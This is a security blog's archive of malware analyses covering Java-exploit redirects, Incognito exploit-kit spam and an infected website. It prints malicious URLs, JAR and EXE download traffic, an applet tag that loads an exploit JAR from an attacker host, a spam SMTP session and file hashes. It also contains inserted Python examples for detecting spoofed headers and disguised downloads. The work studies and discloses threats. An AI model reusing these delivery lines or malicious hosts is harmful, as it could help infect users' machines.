Tag Archives: java exploit

WordPress-how-to-videos(dot)com Spreads Java Exploits

While analyzing a few Twitter followers of one of our websites, we noticed a user who was following us, see the image:

We analyzed the (infected) website:

www (dot) wordpress-how-to-videos (dot) com

The website wordpress-how-to-videos(dot)com is hosted at BSE Software GmbH and its current IP address is 82.220.34.22 (330.hostserv.eu). The server is located in Switzerland (CH) and no other websites are hosted on it. The domain is registered under the COM suffix and the domain keyword is wordpress-how-to-videos. The hosting organization is hosttech GmbH.

The website is used to redirect visitors to a malicious URL that tries to compromise the user's browser with a Java exploit, as you can see from this image:

Java Exploit

The malicious redirect is triggered only when the user reaches the website with a Referer header that contains a search-engine string, such as Google. Using the free HTML Sniffer service we can simulate the Google referer and see that we are redirected to the exploit URL:

The exploit URL seems to be updated very frequently:

garliccommercial .ru /pavilion?8
midwaydance .ru /pavilion?8

Both malicious URLs are hosted on this IP address:

206.53.52 .13

The Java exploit is loaded from another malicious URL:

ypcbpukqt. lflinkup .com /PJeHubmUDaovPDRCJxGMEzlYXdvvppcg

Pay attention when clicking on websites of your Twitter followers!

Spam “Your Bill Me Later notice” leads to Incognito exploit kit

Users have reported another malicious email message with the subject “Your Bill Me Later notice”, which claims you have made a payment of $60.12 over the phone to the Bill Me Later website. The email body is full of HREF links pointing to many malicious URLs; see a screenshot of the email message:

Your Bill Me Later notice

Email header details:

Received: from server.serverhk.net (69-164-193-60.magicnic.com [69.164.193.60])
Received: from [200.76.191.2] (helo=askokay.com) by server.serverhk.net with esmtpsa
Received: from [192.245.26.33] by m1.gns.snv.thisdomainl.com with SMTP; Wed, 16 May 2012 21:04:47 +1000
Received: from [68.117.211.36] by mailout.endmonthnow.com with NNFMP; Wed, 16 May 2012 20:54:02 +1000
Date: Wed, 16 May 2012 20:50:24 +1000
From: "Advera" askokay@askokay.com
Subject: Your Bill Me Later notice

The malicious extracted URLs are:


Using URL Dump we can dump the HTML content:

Dumped HTML Content

From the dumped data, we can see it is the Incognito exploit kit.

Extracted malicious URLs:

hxxp:// bigdeal . my/ZyYJZ7F0/js.js

The malicious URLs redirect users to another malicious URL:

hxxp:// 69.163.34. 134 /showthread.php?t=977334ca118fcb8c

If we use URL Dump and set the user-agent to Java, dumping the content of the new malicious URL shows that the kit recognises from the user-agent that the visitor has Java and tries to serve the infected Java applet:

Dumped Data

Link LinkedIn Mail leads to Incognito exploit kit

We have logged a new email that appears to be sent by LinkedIn:

Scam Email

The email header info shows it is a scam:

Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24])
Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net
Date: Fri, 04 May 2012 08:34:11 -0700
From: "Order" @fixnot.com.tr
Subject: Link LinkedIn Mail
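The Received chains quoted here and in the Bill Me Later post above are what give the forgery away: the connecting host announces one name in HELO while the receiving MTA records a different (or no) reverse-DNS name, and the From: domain is backed by nothing but that self-asserted HELO. The following is an added example, not code from the original posts; it parses the two Received formats seen above (Exim-style `helo=` and Postfix-style `from helo (rdns [ip])`) and applies those two heuristics, with the LinkedIn header excerpt embedded as sample input.

```python
import re

# Sample input, transcribed from the header excerpt quoted in the LinkedIn post above.
LINKEDIN_HEADERS = """\
Received: from lhost10.forahost.net (server-178.211.48.24.as42926.net [178.211.48.24])
Received: from c9069568.static.spo.virtua.com.br ([201.6.149.104]:49583 helo=fixnot.com.tr) by lhost10.forahost.net
Date: Fri, 04 May 2012 08:34:11 -0700
From: "Order" @fixnot.com.tr
Subject: Link LinkedIn Mail
"""

RE_FIRST = re.compile(r"^Received:\s+from\s+(\S+)", re.I)  # token right after "from"
RE_HELO = re.compile(r"helo=([\w.-]+)", re.I)              # Exim style: "([ip] helo=name)"
RE_PAREN_NAME = re.compile(r"\((\w[\w.-]*)\s+\[")          # Postfix style: "(rdns [ip])"
RE_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

def parse_received_chain(raw_headers):
    """One dict per Received: line, newest hop first. helo is the name the peer
    claimed, rdns the name the receiving MTA recorded for it; either may be None."""
    hops = []
    for line in raw_headers.splitlines():
        if not line.lower().startswith("received:"):
            continue
        m = RE_FIRST.match(line)
        named = m.group(1).lower() if m and not m.group(1).startswith("[") else None
        helo_m, paren_m, ip_m = RE_HELO.search(line), RE_PAREN_NAME.search(line), RE_IP.search(line)
        if helo_m:   # Exim: the first token is the reverse-DNS name, HELO is explicit
            helo, rdns = helo_m.group(1).lower(), named
        else:        # Postfix: the first token is the HELO name, reverse DNS is in parentheses
            helo, rdns = named, (paren_m.group(1).lower() if paren_m else None)
        hops.append({"ip": ip_m.group(1) if ip_m else None, "helo": helo, "rdns": rdns})
    return hops

def header_findings(raw_headers):
    """Spam heuristics: a HELO name that contradicts or lacks a reverse-DNS name,
    and a From: domain that is vouched for only by such a self-asserted HELO."""
    hops = parse_received_chain(raw_headers)
    findings = []
    for hop in hops:
        if hop["helo"] and hop["rdns"] is None:
            findings.append(f"{hop['ip']} claimed HELO {hop['helo']} but has no reverse-DNS name")
        elif hop["helo"] and hop["helo"] != hop["rdns"]:
            findings.append(f"{hop['ip']} claimed HELO {hop['helo']} but reverse DNS is {hop['rdns']}")
    m = re.search(r"^From:.*?@([\w.-]+)", raw_headers, re.I | re.M)
    sender = m.group(1).lower() if m else None
    if sender and any(h["helo"] == sender and h["rdns"] != sender for h in hops):
        findings.append(f"From: domain {sender} matches a HELO name that its reverse DNS does not confirm")
    return findings
```

Run `header_findings(LINKEDIN_HEADERS)` to see the three findings for this message; the Bill Me Later headers produce the same pattern, with the origin hop injecting from a bare IP literal.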

The email body also contains a few malicious links:

hxxp:// gopeshmathur .com/ZgUBqavg/index.html

The dumped content of the URL is clearly an Incognito exploit kit:

Incognito exploit kit URLs

All the new malicious links are still alive and they redirect users to:

Incognito exploit kit

The Java exploit JAR files are downloaded from:

hxxp:// 50.116.8. 93 /data/Pol.jar
hxxp:// 69.163.34 .114 /data/Pol.jar
File: Pol.jar
Size: 15404 bytes
MD5: 020B0B477706596E71DE25286ED77991
SHA1: C196A7B07BFE3D3593E93F7D98E910FA8E63AFF6
SHA256: F76AC6983135C7A69B5F07BC762F1AA478E2D49489090AC66882BC8065D1862B
SHA384: 9C6BF2971E1F86588A9A08A3F18C096FBC62A42CE6927E0A7D0AFDB56DA01DBC4A6F72F742CC62B510FC1085221753D5
SHA512: 5464424E028620C4821B740B89787C7A75E6A56401F98BD15BA94F1A9268D54411E41E97DAE86468F4BDA54160A023DCC45F134E97BC6655E31C9274F8A21FC0

The JAR file exploits the vulnerability in the Java Runtime Environment component of Oracle Java SE (CVE-2012-0507), more details from the oracle.com website:

Vulnerability in the Java Runtime Environment component of Oracle Java SE (subcomponent: Concurrency). Supported versions that are affected are 7 Update 2 and before, 6 Update 30 and before and 5.0 Update 33 and before. Easily exploitable vulnerability allows successful unauthenticated network attacks via multiple protocols. Successful attack of this vulnerability can result in unauthorized update, insert or delete access to some Java Runtime Environment accessible data as well as read access to a subset of Java Runtime Environment accessible data and ability to cause a partial denial of service (partial DOS) of Java Runtime Environment.

Other malicious Incognito exploit kit URLs:

hxxp:// ftp.coden .com .br /BhxC8VrP/index.html
hxxp:// generalcontractorsnc .com/nUUyHyvy/index.html
hxxp:// mccgedvalenca .com .br/JFs10e34/index.html
hxxp:// radiooisvira .com /mRpNLgWY/index.html
hxxp:// statisticsolympiad .org /gR2aietM/index.html

URLVoid scan reports:

http://www.urlvoid.com/scan/gopeshmathur .com
http://www.urlvoid.com/scan/jombangit .com
http://www.urlvoid.com/scan/shahinvestment .com
http://www.urlvoid.com/scan/mazyamana .com
http://www.ipvoid.com/scan/72.5.102.224
http://www.urlvoid.com/scan/ftp.coden .com .br
http://www.urlvoid.com/scan/generalcontractorsnc .com
http://www.urlvoid.com/scan/mccgedvalenca .com .br
http://www.urlvoid.com/scan/statisticsolympiad .org
http://www.urlvoid.com/scan/radiooisvira .com

Knowmore.org Infected with Malicious Javascript Code

John has informed us about a new possibly infected website:

hxxp://www.knowmore. org

A fast scan with vscan.urlvoid.com reports that the site is infected:

Report 2011-03-19 01:20:31 (GMT 1)
File Name knowmore-org
File Size 22121 bytes
File Type Unknown file
MD5 Hash d29b303c72a2330ac13155be0b280221
SHA1 Hash 3cf9d0637551e0ce5ac7a9ce243b35e13caf5e80
Detections: 3 / 9 (33 %)
Status INFECTED

We have dumped the content of the website:

Knowmore-org Dump

We then browsed the website in our test environment; this is the result:

GET /count11.php HTTP/1.0
Referer: hxxp://knowmore. org/
Host: maribit. com
 
GET /in.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA== HTTP/1.0
Referer: hxxp://knowmore. org/
Host: kagrinn.cz. cc

Next, an attempt is made to load a Java applet:

<applet code='lort.cooter.class' archive='hxxp://kagrinn.cz. cc/efrthyjkfyiguytdsfsxz.jar' width='300' height='150'>

New network traffic:

GET /out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=6 HTTP/1.0
Host: kagrinn.cz. cc

Response:

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 19 Mar 2011 00:54:42 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Accept-Ranges: bytes
Content-Length: 17920
Content-Disposition: inline; filename=setup.exe
 
MZ.............

The executable file setup.exe is downloaded:

Report date: 2011-03-19 02:21:05 (GMT 1)
File name: setup.exe
File size: 17920 bytes
MD5 hash: 192b0b0d37d3a6666b584e876ca271e5
SHA1 hash: 7ca0e9f10a3cef8a7cc8b7831f675bd7089648f4
Detection rate: 0 on 9 (0%)

Another executable file is downloaded:

GET /client1.exe HTTP/1.0
Host: tamarer. com
 
HTTP/1.1 200 
Server: Apache
Content-Length: 650240
Content-Type: 
Last-Modified: Sat, 19 Mar 2011 00:55:16 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Fri, 18 Mar 2011 21:54:54 GMT
Last-Modified:Sat, 19 Mar 2011 00:52:41 GMT
Accept-Ranges:bytes
 
MZ.................
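Both captures above hand a Windows executable (the MZ header) to the browser while describing it badly: the first is generated by a PHP endpoint and labelled only application/octet-stream with an inline setup.exe filename, the second comes with an empty Content-Type and repeated Server/Date headers. As an added example that is not part of the original post, the following checker parses such a request/response pair and returns the indicators a proxy or IDS rule would key on; the kagrinn.cz.cc exchange is embedded as constructed sample input, its body being a stand-in of the advertised 17920 bytes.

```python
import re

PE_MAGIC = b"MZ"
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-dosexec",
                    "application/vnd.microsoft.portable-executable"}

# Sample exchange, transcribed from the kagrinn.cz.cc traffic above; the body is a
# constructed stand-in (MZ header plus padding) of the advertised 17920 bytes.
REQUEST_KAGRINN = (b"GET /out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=6 HTTP/1.0\r\n"
                   b"Host: kagrinn.cz.cc\r\n\r\n")
RESPONSE_KAGRINN = (b"HTTP/1.1 200 OK\r\nServer: nginx/0.8.54\r\n"
                    b"Content-Type: application/octet-stream\r\n"
                    b"Content-Length: 17920\r\n"
                    b"Content-Disposition: inline; filename=setup.exe\r\n\r\n"
                    + PE_MAGIC + b"\x90\x00" + b"\x00" * 17916)

def parse_http(raw):
    """Split a raw HTTP message into (start line, {lowercased name: value}, body); a repeated header keeps its last value."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def inspect_download(request, response):
    """Findings for a response whose body is a PE file but whose path or headers do not say so honestly."""
    req_line, _, _ = parse_http(request)
    _, headers, body = parse_http(response)
    path = req_line.split()[1].split("?")[0]          # request target without the query string
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    findings = []
    if not body.startswith(PE_MAGIC):
        return findings
    findings.append("body starts with the MZ header of a Windows executable")
    if not ctype:
        findings.append("executable served with an empty Content-Type")
    elif ctype not in EXECUTABLE_TYPES:
        findings.append(f"executable served as {ctype}")
    if path.lower().endswith((".php", ".asp", ".aspx", ".jsp")):
        findings.append(f"executable generated by script endpoint {path}")
    m = re.search(r'filename="?([^";]+)', headers.get("content-disposition", ""))
    if m:
        findings.append(f"Content-Disposition names it {m.group(1).strip()}")
    declared = headers.get("content-length", "")
    if declared.isdigit() and int(declared) != len(body):
        findings.append(f"Content-Length {declared} but body is {len(body)} bytes")
    return findings
```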

Files created during the infection:

c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\setup.exe
c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\MPC5.tmp
c:\WINDOWS\Temp\_ex-68.exe
c:\WINDOWS\system32\Packet.dll
c:\WINDOWS\system32\wpcap.dll
c:\WINDOWS\system32\drivers\npf.sys

Report date: 2011-03-19 02:36:06 (GMT 1)
File name: ex-68-exe
File size: 650240 bytes
MD5 hash: 32f73e995554b8e601c0da661e9a4edb
SHA1 hash: 237cafc9c7c30adee5ac795afd4371fbc19aa41d
Detection rate: 0 on 9 (0%)

Other curious network traffic:

GET /FlopK4F8XFP3oZ1PmQ.htm HTTP/1.1
Host: 98.232.48.112
Content-Length: 594
User-Agent: Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5

Now the malware tries to send spam messages:

220 Comendo Mailfence V3
 
HELO XXX
 
250 ec3-node2.net.comendo.com says HELO to XXX:53746
 
MAIL FROM:<xxx@alcatel-lucent.com>
 
250 MAIL FROM accepted
 
RCPT TO:<xxx@lpmail.com>
 
250 RCPT TO accepted
 
DATA
 
354 continue.  finished with "\r\n.\r\n"
 
[...]
 
Subject: Bring extra pleasance to your xxx-life!
 
[...]
 
FDA-approved blue-blu-colored med to heal ED! 
hxxp://healthcontrol. dk/jhkop806.html
 
[...]

So the spam message contains an HTTP link:

healthcontrol. dk/jhkop806.html

That redirects to:

pillrxdrugstorechains. at

URLVoid domains analysis:

http://www.urlvoid.com/scan/kagrinn.cz.cc
http://www.urlvoid.com/scan/knowmore.org
http://www.urlvoid.com/scan/tamarer.com
http://www.urlvoid.com/scan/healthcontrol.dk
http://www.ipvoid.com/scan/98.232.48.112
http://www.urlvoid.com/scan/pillrxdrugstorechains.at